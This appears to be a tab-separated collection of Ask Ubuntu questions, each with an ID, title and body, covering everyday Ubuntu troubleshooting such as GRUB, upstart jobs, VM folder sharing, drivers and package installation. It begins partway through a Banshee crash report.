banshee.bpm ( 1.9.0.0 ) banshee.youtube ( 1.9.0.0 ) banshee.webbrowser ( 1.9.0.0 ) banshee.wikipedia ( 1.9.0.0 ) pango-sharp ( 2.12.0.0 ) banshee.fixup ( 1.9.0.0 ) banshee.widgets ( 1.9.0.0 ) gio-sharp ( 2.14.0.0 ) gudev-sharp ( 1.0.0.0 ) banshee.gio ( 1.9.0.0 ) banshee.gstreamer ( 1.9.0.0 ) system.configuration ( 2.0.0.0 ) ndesk.dbus.glib ( 1.0.0.0 ) gconf-sharp ( 2.24.0.0 ) banshee.gnome ( 1.9.0.0 ) banshee.nowplaying ( 1.9.0.0 ) mono.cairo ( 2.0.0.0 ) system.xml ( 2.0.0.0 ) banshee.core ( 1.9.0.0 ) hyena.data.sqlite ( 1.9.0.0 ) system.core ( 3.5.0.0 ) gdk-sharp ( 2.12.0.0 ) mono.addins ( 0.4.0.0 ) atk-sharp ( 2.12.0.0 ) hyena.gui ( 1.9.0.0 ) gtk-sharp ( 2.12.0.0 ) banshee.thickclient ( 1.9.0.0 ) nereid ( 1.9.0.0 ) ndesk.dbus.proxies ( 0.0.0.0 ) mono.posix ( 2.0.0.0 ) ndesk.dbus ( 1.0.0.0 ) glib-sharp ( 2.12.0.0 ) hyena ( 1.9.0.0 ) system ( 2.0.0.0 ) banshee.services ( 1.9.0.0 ) banshee ( 1.9.0.0 ) mscorlib ( 2.0.0.0 ) platform information : linux 2.6.35-27-generic i686 unknown gnu/linux disribution information : [ /etc/lsb-release ] distrib_id=ubuntu distrib_release=10.10 distrib_codename=maverick distrib_description= '' ubuntu 10.10 '' [ /etc/debian_version ] squeeze/sid just to make it clear , this happened only after the hard resets and not before . i used to use banshee everyday and it worked perfectly . can anyone help me fix this ?
30189	how do i use virtualbox for windows 7 installer ?	i need to use windows 7 vm to test my web application in internet explorer . i have a bootable usb drive for windows 7 . i have already installed virtualbox . however in the vbox when i press start , the first run wizard is looking for a dvd image , which i do not have . what can i do ?
30191	how can i prevent [ flush-8:16 ] and [ jbd2/sdb2-8 ] from causing gui unresponsiveness ?	approximately twice a week , the entire graphical interface will lock up for about 10-20 seconds without warning while i am doing simple tasks such as browsing the web or writing a paper . when this happens , gui elements do not respond to mouse or keyboard input , and the system monitor applet displays 100 % iowait processor usage . today , i finally happened to have gnome terminal already open when the problem started . despite other applications such as google chrome , firefox , gnome do , and gnome panel being unresponsive , the terminal was usable . i ran iotop and observed that commands named [ flush-8:16 ] and [ jbd2/sdb2-8 ] were alternately using 99.99 % io . what are these , and how can i prevent them from causing gui unresponsiveness ? details $ mount | grep ^/dev /dev/sda1 on / type ext4 ( rw , noatime , discard , errors=remount-ro , commit=0 ) /dev/sdb2 on /home type ext4 ( rw , commit=0 ) $ cat /proc/swaps filename type size used priority /dev/sdb3 partition 1052252 0 -1 /dev/sda is an ocz-vertex2 and /dev/sdb is a wd10ears . here is dumpe2fs /dev/sdb2 and smartctl /dev/sdb -- all . i do n't see anything unusual in dmesg or /var/log/syslog .
30196	is it possible to use a 2.6.38 kernel with 10.10 ?	i have simple question . is it possible to use new 2.6.38 kernel with ubuntu 10.10 ? does there exists some ppa or you need to compile ?
30198	transparency background wrong on dual-screen	using compiz with transparency behind windows and borders on a dual-screen system ; all works fine , but the background that shows through with any transparency done by compiz is wrong . it appears to be using the whole-width image from the display to generate the transparent image , but applying it to each display separately ; so it 's squished horizontally by 50 % , and does n't match the foreground . cripes this is hard to put into words ... if anyone can tell me how to grab a screengrab i can paste it somewhere ! i 'm an ubuntu veteran -- but new to ubuntu desktops ! ( display controller is ati technologies inc radeon x1650 pro )
30202	vmware sharing folders between win7 ( host ) and ubuntu ( guest )	what is the best way to share a folder between win7 64bit ( host ) and ubuntu 10.10 ( guest ) in vmware player ? i can setup the sharing just fine ( using vmware-tools ) , but all shared files are root : root owned with 777 permission set . which , well , sucks . what can i do to have shared files with preserved ownership and permissions ? i 'm guessing i would need some kind of a file container , that would get mounted in ubuntu as a block device ( if so , it would need to be dynamic , i.e . expand with size of contained files ) . but maybe there is a better solution ?
30203	can i install debian unstable scala 2.8.1 package in ubuntu ? wo n't it cause problems ?	i am coding scala and would like an up-to-date 2.8.1 of it to be installed in my ubuntu 10.10 system , but there is only obsolete 2.7 package available in ubuntu repositories , so i have to go slackware-way and use manual installation from tarballs . at the same time there is already scala_2.8.1.dfsg-1_all.deb available for debian . ca n't i just install it in ubuntu ?
30206	why do the same wine applications appear in applications list many times ? how to fix this ?	why are there 4 ies ( i have not installed them manually , may be one , but not four ) , 2 wordpads , 2 `` winebrowsers '' ( and 2 notepads there up the list ) ? do you know how fix this correctly ?
30209	ppa & packaging : packaging source as a binary package	i 'm trying to create a .deb for a python-based irc bot . i 've already gone through the ubuntu packaging guide , and done a debuild -s on it to create the source package . when its uploaded to the ppa , it fails to include the code for the bot ( which is necessary for the bot to run ) . how do i make the .deb so that it ( a ) isnt a source package , and ( b ) includes the code for the bot so that it can be run ? edit and by `` includes the code for the bot so that it can be run '' , i mean so that the .deb extracts the code to the location in the virtual file structure that i specified so that it can be used by any user . note that because its a python bot , there 's no single executable file in the code , which explains the need for the source to be packaged and extracted with the .deb
30210	what does “ % u” mean when calling a command ?	when editing the applications menu , i see for some applications , their commands have “ % u” such as `` gedit % u '' and `` gnome-mplayer % u '' , but others do n't such as `` gcalctool '' . i was wondering what“ % u” means when calling a command , and when it is needed and when it is not ? thanks ! this is motivated from my previous question , where i followed a reply but did not make it work .
30219	can i block log messages from specific devices or drivers ?	i 'm getting `` nvrm : os_raise_smp_barrier ( ) '' messages in syslog and dmesg at a rate of 4-6 per minute ; i think it 's from the nvidia graphics driver . the system behaves normally , but the messages clutter up the logs so i ca n't find any real issues . ( at the moment dmesg is 4,000 lines and 3,925 of those lines are the same message . ) is it possible to suppress or redirect these messages ? example log snippet : mar 13 20:38:04 desktop kernel : [ 175481.413559 ] nvrm : os_raise_smp_barrier ( ) , invalid context ! mar 13 20:38:04 desktop kernel : [ 175481.430904 ] nvrm : os_raise_smp_barrier ( ) , invalid context ! mar 13 20:38:45 desktop kernel : [ 175522.223337 ] nvrm : os_raise_smp_barrier ( ) , invalid context ! mar 13 20:38:45 desktop kernel : [ 175522.239655 ] nvrm : os_raise_smp_barrier ( ) , invalid context ! mar 13 20:38:47 desktop kernel : [ 175523.556706 ] nvrm : os_raise_smp_barrier ( ) , invalid context ! mar 13 20:38:47 desktop kernel : [ 175523.572015 ] nvrm : os_raise_smp_barrier ( ) , invalid context !
30220	how can i resize an external usb ntfs partition ?	i have a new usb drive which came with a single ntfs partition . how can i shrink that so that i can create an ext4 partition ? gparted does not seem to have the `` resize '' option highlighted . update : after following the directions below , after unmounting i am still not able to resize the partition . there is a warning though : unable to find mount point . unable to read the contents of this file system ! because of this , some operations may be unavailable . the following list of software packages is required for ntfs file system support : ntfsprogs '' . however , with the partition mounted , i can read & write to the file system on the drive just fine , and ntfsprogs is installed and current . what 's next ?
30221	when will postgres 9 be supported ?	when will ubuntu support postgres 9 ?
30223	external hard drive gets wrong user as owner	when i attach my external hard drive , i can not access it , because permissions are granted not to me but to another user . i 'm using ubuntu 10.10 , maverick meerkat . where do i report this as a bug ? 1b . is it a ubuntu , or a nautilus , or a gnome problem ? is there a solution for this problem ? any help will be appreciated !
30224	how to disable the alt-hotkey behavior on gnome terminal ?	this is not just gnome terminal , but pretty much all gnome windows : when you hold the `` alt '' key , you can press the first letter of one of the menu items . this will let you scroll that menu without clicking on it directly . this is okay on any other window , like say firefox , but on gnome terminal , it steals the keys i use for emacs ! ! there is very little chance of me learning a new set key combinations if i can avoid . if i ca n't isolate this just to gnome terminal , i 'm fine with that .
30226	change from the minstrel algorithm	i would like to stop my network card from using the minstrel algorithm because of a problem i am having . i have tried creating /etc/modprobe.d/80211.conf with the following in it : options mac80211 ieee80211_default_rc_algo=pid but that does n't seem to work . any ideas ?
30231	multimedia keys stopped working	though correctly mapped , some of my multimedia keys stopped working on my asus 1215n ( ubuntu 10.10 ) . all fn keys are working excepting the ones related to rhythmbox ( xf86audionext , xf86audioprev , xf86audiostop , xf86audioplay/xf86audiopause ) . i can not tell when this issue began or if any packages where updated before this occurred . anyone knows how can i fix this ?
30233	how to install an application manually into the application list	i am trying to install zendstudio 8 ( eclipse based ) on 11.04 and am kinda stuck at the part were i can get it into the applications list . zendstudio prior to version 8 came with a magic .bin which installed it all no problems , but now it simply comes as a folder all set up to be run as-is . i have copied this folder to /opt/zendstudio , and i can launch the program using /opt/zendstudio/zendstudio but in the unity launcher it shows up with a grey box and a big question mark as it 's icon . however , i 'd like it to be show up in the applications list so i can search for it and load it like a normal application . i also want to pin it to the launcher so it stays there the whole time , and i tried this with running it directly but it did n't work and it did n't load up the application icon . any ideas how i can finish the install so it is in my menus etc ?
30234	installed ruby 1.9.2 but new gems wo n't create scripts into /usr/bin	i had previously ruby 1.8 on my ubuntu 10.10 , which i removed through synaptics . then i have installed ruby 1.9.1 also via synaptics ( which is then saying that itself is version 1.9.2 ) . then i installed ruby-debug19 and rspec gems with sudo gem install ruby-debug19 rspec however i ca n't start rdebug or rspec , but i can invoke the debugger from inside my ruby script , so the debugger is working . i inspected the starting scripts rdebug and rspec and then i realized that they are still old scripts back from ruby1.8 time . in other words , the current 1.9 install of these gems have n't created the starting scripts anywhere . what is the easiest solution for a lazy soul like me ? it looks like removing-reinstalling ruby 1.9.2 wo n't help , and installing these gems over and over again wo n't create the starting scripts .
30242	how to fix avi index error	i try to open an avi file . the first software i tried is vlc media player . it reports some error about avi index : this avi file is broken . seeking will not work correctly . do you want to try to fix it ? this might take a long time . i chose yes , and it began fixing avi index and existed when the repair progress bar reaches 20 % or so . then the video started playing and stopped much earlier than when it is supposed to finish . next i tried to open it in totem movie player , which also stopped earlier at the same place as in vlc player . i tried to play it in gmplayer . now the entire avi file can be played from start to finish , but it is impossible to drag playing progress bar while it was possible in vlc player and totem player . i heard that avidemux can fix avi index error , but later discovered it even failed to open the avi file before it could try to fix the error . so i was wondering how i can fix the avi index error , or at least drag the playing progress bar in gmplayer ? thanks and regards !
30243	why does ubuntu refuse to execute files from an ntfs partition ?	i mount an ntfs partition ( where i 've got some linux binaries and scripts alongside with win32 and data files ) with the following fstab line : /dev/sda5 /mnt/dat ntfs-3g rw , dev , exec , auto , async , users , umask=000 , uid=1000 , gid=1000 , locale=en_us.utf8 , errors=remount-ro 0 0 all files seem to have executable attribute set then , but if i try to actually execute them , i get `` permission denied '' error . even with sudo . even while execute ( as well as read and write ) permissions are granted to everyone and all the files owner is set to the user . so how do i set the system up to be able to run linux binaries from ntfs ?
30249	in empathy irc , how do i turn off the `` joined '' and `` disconnected '' messages ?	in empathy irc , how do i turn off the `` joined '' and `` disconnected '' messages ?
30255	trying to install ubuntu netbook 10.10 but it hangs on the `` who are you '' screen	i have an `` acer aspire one zg8 netbook '' , and i wanted to install ubuntu on it for quite some time , but it wo n't install . it has wiped windows from my hard drive already , so i ca n't go back to the horrible `` win7 starter edition '' , that came with this netbook . i would really love a way to fix this , but right now i am using the `` try ubuntu / live cd '' aspect just so i have use of the internet . no idea if i will be able to download an older version and try again from here or what to do . any help would be great .
30267	is there an alternative for scrivener ( a tool for writers to arrange ideas ? ) ?	scrivener is a word processing app designed for writers with a unqiue interface and tool set focused on âgenerating contentâ rather than simply allowing for content to be written . anything like that for ubuntu ?
30270	how can i install katesql plugin ?	i am slightly new to ubuntu and i just installed kate by typing sudo apt-get install kate . now i want to install this kate sql plugin and google is not helping me . i downloaded a punch of files from here what should i do with these files ? where should i put them ? would you please tell me how can i install this ? thanks
30271	page keeps scrolling	i 'm running ubuntu 10.10 . i 've got a non-usb mouse , and the scroll roller on my mouse works . but when i use the mouse pointer on the scroll button at the right bottom of the page , it begins scrolling itself and i ca n't stop it . any ideas on how to fix this ?
30273	ubuntuone blocked by norton safe web	are you aware that norton safe web blocks access to files published on ubuntuone ? reason given is they found a malicious worm uploaded ( to a stated url ) . we send `` community '' feedback explaining we think their blocking is not right . they do not block hotmail , gmail or yahoo because some user send an infected mail ? might need follow-up from your site though .
30276	screen savers : windows .scr in ubuntu ?	does anyone know if this is possible ? i 'm a star trek fan , and there 's this screensaver that 's for windows that mimics a star trek systems panel , and i 'd love to have that on ubuntu ( so would some of my friends ) .
30278	how to connect a few pcs without internet access ?	i want to connect a few pcs in my company so that they can share files , chat , and transmit data . i have no internet connection . i want to accomplish this without internet but whenever needed i can connect them to the internet , but for now there is no internet service . please provide step-by-step instructions for proceeding as i am quite new to this sort of thing . any help would be greatly appreciated .
30279	restoring a note	is it possible to restore a deleted note in ubuntu one ? on the web page `` recent activities '' it says `` todo deleted ''
30280	how to make the emacs not to pop up a window when using tab-completion ?	when i use the emacs shell mode or in gdb , when i type double tab , the emacs pop up a new window which always cover an existed window . while in terminal , when i type double tab , to complete a directory , the terminal just print all the candidates in the same window . can i make the emacs not to pop up a new window when i use this feature ?
30287	upstart kill timeout not respected ?	i am currently learning upstart by playing around . i think i have understood the principle now , but i am having difficulties with the `` kill timeout '' stanza in upstart jobs . for example , i have the following job ( filename /etc/init/test.conf ) : description `` test '' start on test console owner kill timeout 5 task exec /root/test the file /root/test is a small shell script which runs forever : while true ; do o=1 ; done ; when doing `` initctl start test '' , the job `` test '' is run and calls the script `` /root/test '' . i can verify that by doing `` initctl status test '' which shows the job as running as well as by doing `` ps -alf '' . now , the `` kill timeout 5 '' stanza should cause the job to be killed after 5 seconds . but instead , the job seems to run forever . i would like to know if i am using and understanding the kill timeout stanza in the right way . it is an essential feature for me . this is on natty 11.04 , but i think the question applies to other versions as well . thank you very much , binarus
30290	what is the best 2d driver for geforce4 mx 440 ?	i still have n't upgraded to the latest version of ubuntu because of poor support for this video card . what is the recommended upgrade path to ensure maximum 2d performance ?
30295	how to permanently add css to some pages using firefox ?	how to permanently add css to some pages using firefox ? say , i want to change the font or background of a page i frequent using firefox . how to do that ?
30298	dock does not show after updating to 10.10	after successfully updating my netbook from 10.04 to 10.10 , i also tried to update my older toshiba satellite a100 , everything seemed to go well and indeed it all appears to be there , it 's just that the dock does not show at all on the l/h side and the time , battery , network , etc also do n't show on the upper right . when i click where they are supposed to be , they work , is it just that i ca n't see them ? i just have a theme background ( which i have tried changing to no avail ) and nothing else . any ideas ? thanks , paul t .
30301	how do i screen-capture an inactive window ?	how can i screen-capture an inactive ( minimized / on another workspace ) window in ubuntu ? applications like imagemagick 's import are only able to capture active windows . when attempting to capture an inactive window , i get the following message : unable to read x window image ` < id > ' : resource temporarily unavailable @ error/xwindow.c/ximportimage/5023 . might be able to do this using compiz , as it is able to render previews of inactive windows . furthermore , in my specific case , the window i want to capture is run in a wine explorer-container . inside that container the application is always active .
30302	upgrading to linux-image-2.6.32-30-generic failed	this morning i upgraded the server running ubuntu 10.04 to the latest kernel ... except that apt-get returned an error . i 'm pretty sure i should n't reboot , so i 'm asking here to help solve the problem so i can reboot safely without compromising the machine . ( it runs a network share which all the developer 's svn clients commit to - it 's very important to keep downtime to a minimum ) . i was using webmin to send the command at the time . http : //codepad.org/7rpa7cko any help would be very much appreciated ! john update : sudo apt-get install -f did n't work , sudo apt-get update & & sudo apt-get upgrade gave me this : codepad.org/flwnsmo8
30305	install a different version of a package	i 'm running lucid server and have installed tomcat . the version it installed is 6.0.24-2ubuntu1.6 . is this the version i 'm tied to ? is it possible to install a more recent version ? the one available from maverick is 6.0.28 . maybe i can add a source to provide my lucid install with this version ? in the package manager user interface i can `` force version '' . is it possible to force version from command line alternative as well ?
30312	empathy fails to show any contacts , accounts say status is set to offline when it is n't	when i start empathy absolutely no contacts appear , including if i check to show offline contacts . my accounts are set up and authenticated and yes - i do have contacts on both accounts . when i check the accounts page both of them say `` offline -- status is set to offline '' despite the fact i have manually set my status to available . if i uncheck `` enabled '' for the account and then re-enable it it connects fine , but it seems when empathy first starts up it 's incapable of doing that itself . anybody got any suggestions ? i 'm using a fresh 32bit install of 10.10 with all updates installed and gnome 2.32 .
30313	google chrome user agent , wrong language	after some months , my chrome ( now 10.0.648.127 beta ; but i tried with the lastest stable too ) displayed some popular sites in english , instead of my chrome & system language , which is hungarian ... i saw my user-agent , which shows in chrome : mozilla/5.0 ( x11 ; u ; linux i686 ; en-us ) applewebkit/534.16 ( khtml , like gecko ) chrome/10.0.648.127 safari/534.16 but in firefox : mozilla/5.0 ( x11 ; u ; linux i686 ; hu-hu ; rv:1.9.2.15 ) gecko/20110303 ubuntu/10.04 ( lucid ) firefox/3.6.15 , what is correct ... my question is : how can i change my user-agent ( maybe dynamically , by version ) ? i tried with google-chrome -- user-agent `` text '' , but it failed in the newest versions .
30315	will unity make it easier to resize the active window ?	in the present gnome 2.x desktop , it is a major burden trying to resize a window 's size ( e.g. , placing the cursor in the lower right corner to increase or decrease the dimensions of the window ) . it is difficult to get the cursor to perform this action in gnome 2.x . i 'm really hoping the developers address this critical function and make window-resizing workable with unity .
30325	admin authentication takes forever	i am running ubuntu 10.10 installed through wubi . when every i have to authenticate for administrative privileges ( like for installing software ) , the authentication window just hangs there forever after i put in my password . how can i fix this ?
30326	vmware fusion folder sharing not working with server	i have a ubuntu server running in vmware fusion 3.1.2 on my macbook pro for java development and all my projects sit on my mac in ~/workspace/coldfusion . i had coldfusion/ shared with my vm through the vmware tools , and it was working perfectly up until friday when the folder sharing just stopped . no updates on either mac or linux besides an itunes update . i tried uninstalling the vmware tools and reinstalling them but i get an error at the end of the install . it appears that when i reinstall the tools there are files left over from the old installation . is there a way to force the unsinstall script to completely uninstall and remove all files for the vmware-tools ? i know the shared folder used to mount at /mnt/hgfs/coldfusion .
30328	restart problem after installing graphical card driver	my laptop is lenovo t400 , running ubuntu 10.10 . my problem : i just run jockey-gtk and installed ati/amd proprietary fglrx graphics driver . but after reboot , there is a short period of graphical `` ubuntu '' and then instead of starting x-window it completely changed to command line to ask me to login . even after login and then issuing xinit , it still failed to start x . to solve this problem : i followed this post , where one person suggested to you can simply write sudo apt-get remove fglrx this worked for me . if it doesn't work , then try sudo apt-get remove xorg-driver-fglrx and restart . i actually do n't need the driver anyway , so i issued the first command after login under command line . but after reboot , the situation is even worse , and there is now even no command-line interface to ask me login , instead the screen is completely blank with just some ambient light in the background and ubuntu is hanging there probably forever . so i have no chance to try the second command the person suggested . i was wondering what i can do now to solve my problem ? thanks and regards !
30330	`` paths must precede expression '' error when trying to find all jpg files in the current directory	while running find command to find all the jpg files in the current directory as find . -maxdepth 1 -type f -name *.jpg i am getting the error as : find : paths must precede expression : pic1 ( 1 ) .jpg usage : find [ -h ] [ -l ] [ -p ] [ -olevel ] [ -dhelp|tree|search|stat|rates|opt|exec ] [ path ... ] [ expression ] i am not able to figure out what is wrong with that .
30331	upgrade from 9.10 to 11.04	i have an installation in my machine ( my version is 9.10 karmic ) and i got a warning to upgrade to a version 10.04 , to me it is okay , and i would like to upgrade to the 10.04 , but here is my question . if i do , what will happen to my system of files ? all my files ? my programs , my apache configuration ? all my servers.. does everything reset to default ? will i lost all my data ? because if yes , will lost everything , why such a warning appears to me ? then the best solution is , format everything and install a brand new ubuntu version 11 . otherwise i still using 9.10 karmic version , and just update normally as i 'm required.. what is the best to do on this situation ? appreciate any help !
30332	i have neither grub.conf nor menu.lst	i just compiled my own kernel for the first time . because it is mentioned in a tutorial , i now want to check whether the kernel got written into the grub.conf file . well , i did not find a grub.conf file . so i googled . answer : ubuntu does not have grub.conf , but rather has a menu.lst ( also stored in /boot/grub ) . so i looked for that file . but i do n't have that one either . so now the question : where is my grub data stored ? i 'm using ubuntu 10.10 with kernel 2.6.35-27 .
30334	what application indicators are available ?	this question exists because it has historical significance , but it is not considered a good , on-topic question for this site , so please do not use it as evidence that you can ask similar questions here . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on ask ubuntu and will be closed per the help center . i installed ubuntu 11.04 on one of my systems and i am using the unity interface . unity is working quite well so far but i really miss panel applets for net speed , cpu temp , and system monitor . these applets are useful for viewing quick info . unlike 10.10 , there is no other way to get this info onto the panel or unity launcher . there are solutions like screenlets and conky but they do n't feel appropriate for a clean desktop look . if you know one then please list out any third party indicators with links so that they can be found .
30335	shortcut to go to the next unread mail in evolution ?	apparently the period key is the shortcut to go to the next unread mail if you are in the message list pane . but how do i get there in first place ? is n't there a global shortcut ? i do not care which pane has the focus right now , i just want to go to the next unread mail without touching the mouse . is that possible ?
30336	advanced system monitor/task manager ?	when using kubuntu i noticed that the standard task manager/system monitor was a bit more capable than gnome-system-monitor , is there a more advanced system/task monitor for ubuntu that is based on gnome opposed to kde ? specifically the features from the kubuntu task manager that i am looking for are the ability to control the i/o priority of individual processes ( not just their nice ) , and the ability to control the i/o scheduling algorithm ( round-robin , fifo , etc ) . what are my options ?
30337	connect to new wireless network	wireless networking was working perfectly on my old adsl router . then i moved to a new home that does not have adsl , and the router has been replaced with a new 3g one . i have worked through the following links : connecting to a wireless network and http : //ubuntuforums.org/showthread.php ? t=571188 i have set the router from it 's default wpa-psk encryption to wep encryption and also to no encryption . but when i get to dhclient -wlan0 , i keep getting no dhcpoffers received . yet the 2 windows machines in my home connect fine to this wirelesss network ( in all encryption settings ) . if i try iwlist scan i can see that the wireless network is indeed visible . where do i start scratching to see where the problem may lie .
30338	copy files without root permissions	in my college we have only little permission to use files.i need to copy some c programs from other users to my account . i can not copy it to /tmp and then copy it back to my account from there , because the cp and mv commands are blocked here . when i copy something to tmp we can not even have the read permission on it . can you please give a good solution for this ?
30339	problem with tint2 transparency	i 'm trying tint2 whilst using a gnome desktop . the transparency does n't seem to work properly , as instead of displaying the active window underneath the panel , it displays the underlying desktop background image , thus not giving a sense of real transparency ( screenshot ) . is it possible to fix this or am i doomed unless i switch to openbox ? edit : using ubuntu 10.10 with compiz
30341	how to know the partition where grub is installed	i am dual booting maverick with natty . i want to know which partition has grub installed . i want to make sure that grub is installed in the maverick partition not in natty , so that when i remove the natty partition , i do n't have booting problem in the absence of grub . on maverick there is no menu.list file in /boot/grub but natty has one . here is the output of fdisk -l gaurav @ gaurav-desktop : ~/desktop $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9cdb9cdb device boot start end blocks id system /dev/sda1 * 1 7295 58592773+ 83 linux /dev/sda2 7295 25475 146033664 83 linux partition 2 does not end on cylinder boundary . /dev/sda3 25476 32194 53970367+ 83 linux /dev/sda4 32195 35483 26414081 5 extended /dev/sda5 32195 32444 1999872 82 linux swap / solaris /dev/sda6 32444 35483 24413184 83 linux gaurav @ gaurav-desktop : ~/desktop $
30352	why is there only one configuration management tool in the main repository ?	how is it that cfengine does not exist in the ubuntu ( 10.04 lts ) main repository ? i ca n't find a discussion of this anywhere ( using google ) . the only configuration management in ubuntu main seems to be puppet . i looked for a wide variety of others as well - all from wikipedia 's list of configuration management tools - and none of them are present in ubuntu main . i looked for bcfg2 , opensymbolic , radmind , smartfrog , spacewalk , staf , synctool , chef - none are present . from my vantage point as a system administrator , i would have expected to find at least bcfg2 , puppet , cfengine , and chef ( as the most widely used tools ) . why is cfengine ( or chef and others ) not included in ubuntu main ? why is there only one configuration management tool in ubuntu main ? by the way - the reason this is important in the context of server administration is because ubuntu main is fully supported by the ubuntu team with updates and security updates ; the other repositories are not .
30353	wol and sleep mode	i have a small ubuntu server set up as a media server and web server for my home network . the usage of the server however is less than 5 % of the day , so i am trying to find a neat solution to wake up when someone accesses the server sleep/hibernate when the server is inactive for more than 10 minutes is there a simple solution , or a package already available ? or am i going to have to resort to building a set of scripts to do this for me ? i am running 10.04lts , in a headless server mode .
30357	how to install firefox 4 rc on ubuntu 10.10 ?	i removed the firefox 3.6 from my system & installed it again using ubuntu software center . but now it is showing the following error : could not launch 'firefox web browser' failed to execute child process `` firefox '' ( no such file or directory ) now i am trying to install firefox 4 rc but that is not getting installed too .
30358	twinview on gnome when monitor is unplugged	i have a macbook pro which is often connected to a monitor , twin view on gnome works pretty well , but a problem arises when i disconnect the monitor , any window that resided on that workspace is no longer available . another issue is when i start my computer when a monitor is not present , because xorg.conf file has the monitor configuration in it , my mouse pointer often disappears in the other monitor 's virtual space , as if it is currently plugged , osx deals with this issue elegantly by refreshing the display every time a plug in/out occurs , is there anything similar that can be done in linux ? > xrandr -- auto xrandr : failed to get size of gamma for output default > xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 3200 x 1080 , current 3200 x 1080 , maximum 3200 x 1080 default connected 3200x1080+0+0 0mm x 0mm 3200x1080 50.0* my first monitor is a macbookpro 5.5 13 inch display , and the second is a 24 inch display working at 1980x1024 ( 1080p ) resolution
30361	how to start gnome-shell ?	i successfully installed gnome 3 and gnome shell from the launchpad ppa on my fully updated natty test system . however , nothing i tried could get it to actually run . if i selected it in the startup options , i got a plain light blue screen with absolutely nothing on it . if i tried to start it using gnome-shell -- replace , i got : gnome-shell -- replace & [ 2 ] 3251 tim @ nattytest : /usr/lib $ traceback ( most recent call last ) : file `` /usr/bin/gnome-shell '' , line 705 , in < module > normal_exit = run_shell ( ) file `` /usr/bin/gnome-shell '' , line 293 , in run_shell if shell is none : unboundlocalerror : local variable 'shell ' referenced before assignment /usr/bin/compiz ( core ) - error : screen 0 on display `` :0.0 '' already has a window manager ; try using the -- replace option to replace the current window manager . [ 2 ] + exit 1 gnome-shell -- replace i also tried preceding that with metacity -- replace , as suggested at ubuntuforums.com . but , i got the same failure . i also linked /usr/lib/libmozjs.so to /usr/lib/xulrunner-2.0b12/libmozjs.so , which did not help either . no matter what i try , i get the same error messages .
30363	how to edit `` most visited '' section of new tab page in chromium ?	when i open a new tab in chromium , it displays the 'new tab ' page , which ( among other things ) contains the 'most visited ' pages . i want to add a new webpage to that list . how do i do that ? i 've tried visiting the webpage several times , and clicking the 'x ' for the other choices , but it never shows up . is there a way to manually edit what pages show up there ?
30374	boot failure : no default or ui configuration directive found !	i 've tried to install ubuntu on a vmware virtual machine , but it never gets past the bootloader : isolinux 4.01 debian-20100714 etcd copyright ( c ) 1994-2010 h. peter anvin et al no default or ui configuration directive found ! boot : _ i 've also tried to burn this .iso image to a cd and go from therem but i got the same problem . some more details : vmware server 2.0.2 build 203138 on windows 2008 r2 ubuntu-10.10-desktop-i386.iso image used ( downloaded yesterday evening )
30375	dbus sporadically not starting at boot	i 'm finding that a number of fairly essential daemons and programs are not starting up at boot time , most of the time . this is a pretty fresh ( a few weeks old ) install of 10.10 on an acer aspire 5742 laptop . my uneducated guess is that something is preventing dbus from starting , and that this dominoes everything else . the components that i 've noticed not working include gdm/xorg . when this happens , there are no messages logged to /var/log/syslog , /var/log/messages , etc . presumably this is because syslog depends on dbus to deliver its messages . at this point dmesg does n't show anything obviously unusual . so when this happens , my system boots into a console . ps -ef | grep dbus shows that dbus is not running . when i start dbus , via sudo /etc/init.d/dbus start , gdm comes up and i can log in normally . syslog â which is running â seems to need a restart ( sudo /etc/init.d/rsyslog restart ) at this point before it will start logging anything . during problematic boots , i am seeing some messages to the effect that repeated efforts to start statd failed . i do n't think there 's anything else unusual in there , though i 'm not sure how to check it out in detail because it does n't get logged . the messages about statd are not present in /var/log . how can i troubleshoot this ?
30378	losetup encryption not working	i 've got /dev/sdb1 encrypted and mounted as /home . the following line is in /etc/fstab : /dev/sdb1 /home ext3 noauto , loop=/dev/loop6 , encryption=aes128 and # mount /home works fine , but # losetup -e encryption=aes128 /dev/loop0 /dev/sdb1 which i 'm sure always used to work , gives : ioctl : loop_set_status : no such file or directory , requested cipher or key length ( 128 bits ) not supported by kernel does anyone know why ? if the mechanism for aes encryption over loopback devices has been changed , how am i supposed to fsck such a drive ?
30379	file added to project does n't get added to packages	i 'm creating customized binary versions of openstack nova packages ( lp : nova ) using their packaging scripts ( lp : ~openstack-ubuntu-packagers/ubuntu/natty/nova/ubuntu ) . i create binaries by doing : dpkg-buildpackage -b -rfakeroot -tc -uc -d this creates a set of packages ( python-nova , nova-common , nova-compute , ... ) . in our customized version of the code ( lp : ~usc-isi/nova/hpc-trunk ) , we recently merged in some changes from another branch , and there 's now a new file in our repository that was n't in upstream : nova/virt/cpuinfo.xml.template . this file is n't getting added to any of the packages , where it should be added to python-nova . why would n't dpkg-buildpackage be including this file ? a more basic question : how does dpkg-buildpackage determine which files go in which packages ? is it related at all to the debian/watch file ? this contains some urls that are pointing to the upstream project . version=3 http : //launchpad.net/nova/+download http : //launchpad.net/nova/.*/nova- ( . * ) \.tar\.gz http : //nova.openstack.org/tarballs/ nova- ( . * ) .tar.gz
30383	best way to make a shutdown hook ?	since ubuntu relies on upstart for some time now , i would like to use an upstart job to gracefully shutdown certain applications on system shutdown or reboot . it is essential that the system 's shutdown or reboot is stalled until these applications are shut down . the applications will be started manually on occasion , and on system shutdown should automatically be ended by a script ( which i already have ) . since the applications ca n't be ended reliably without ( nearly all ) other services running , ending the applications has to be done before the rest of the shutdown begins . i think i can solve this by an upstart job which will be triggered on shutdown , but i am unsure which events i should use in which manner . so far , i have read the following ( partly contradicting ) statements : there is no general shutdown event in upstart use a stanza like `` start on starting shutdown '' in the job definition use a stanza like `` start on runlevel [ 06s ] '' in the job definition use a stanza like `` start on starting runlevel [ 06s ] '' in the job definition use a stanza like `` start on stopping runlevel [ ! 06s ] '' in the job definition from these recommendations , the following questions arise : is there or is there not a general shutdown event in ubuntu 's upstart ? what is the recommended way to implement a `` shutdown hook '' ? when are the events runlevel [ x ] triggered ; is this when having entered the runlevel or when entering the runlevel ? can we use something like `` start on starting runlevel [ x ] '' or `` start on stopping runlevel [ x ] '' ? what would be the best solution for my problem ? thank you very much
